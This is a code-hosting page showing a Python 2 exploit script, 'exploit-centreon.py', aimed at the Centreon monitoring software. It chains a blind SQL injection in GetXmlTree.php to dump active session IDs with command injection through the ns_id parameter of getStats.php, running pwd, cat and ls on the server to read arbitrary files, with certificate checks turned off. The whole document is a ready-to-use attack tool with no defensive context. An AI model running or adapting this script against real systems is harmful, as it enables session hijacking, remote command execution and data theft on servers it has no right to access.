-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit-centreon.py
93 lines (59 loc) · 2.07 KB
/
exploit-centreon.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#!/bin/env python
import blindinject
import sys
import urllib2, ssl
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
def usage():
print 'Usage: python %s <root> ACTION [...]' % sys.argv[0]
print ' ACTIONS:'
print ' SESSION'
print ' PWD <session>'
print ' CAT <session> <file>'
print ' LS <session> <file | directory>'
print ''
sys.exit(1)
if len(sys.argv)<3:
usage()
ROOT = sys.argv[1]
ACTION = sys.argv[2]
if not ACTION in ['SESSION','PWD','CAT','LS']:
usage()
if ACTION == 'SESSION':
''' SQLInjector parameters & callbacks '''
cols = ['session_id']
addWhere = '1'
def patternCB(res):
return res.find('Fatal error')==-1
def simpleURLencode(url):
return url.replace(' ', '%20').replace('#', '%23')
''' CODE '''
SI = blindinject.SQLInjector(ROOT + '/include/common/XmlTree/GetXmlTree.php?sid=', '0\' OR (SELECT COUNT(*) FROM (', ') AS res2)=1#', '', patternCB, simpleURLencode)
BBlist = blindinject.BlindBuild(SI, 1, 'centreon', 'session', cols, addWhere, True)
dumplist = BBlist.run()
if count(dumplist)==0:
print 'No session active in database, try later...'
sys.exit(2)
for line in dumplist:
print 'Session found: %s' % line['session_id']
if ACTION == 'PWD':
if len(sys.argv)<4:
usage()
SESSION = sys.argv[3]
res = urllib2.urlopen(ROOT + '/include/Administration/corePerformance/getStats.php?session_id=' + SESSION + '&key=cmd_buffer&ns_id=|pwd%20', context=ctx).read()
print res
if ACTION == 'CAT':
if len(sys.argv)<5:
usage()
SESSION = sys.argv[3]
FILE = sys.argv[4]
res = urllib2.urlopen(ROOT + '/include/Administration/corePerformance/getStats.php?session_id=' + SESSION + '&key=cmd_buffer&ns_id=|cat%20'+FILE+'%20', context=ctx).read()
print '\n'.join(res.split('\n')[:-9])
if ACTION == 'LS':
if len(sys.argv)<5:
usage()
SESSION = sys.argv[3]
TGT = sys.argv[4]
res = urllib2.urlopen(ROOT + '/include/Administration/corePerformance/getStats.php?session_id=' + SESSION + '&key=cmd_buffer&ns_id=|ls%20-al%20'+TGT+'%20', context=ctx).read()
print '\n'.join(res.split('\n')[8:])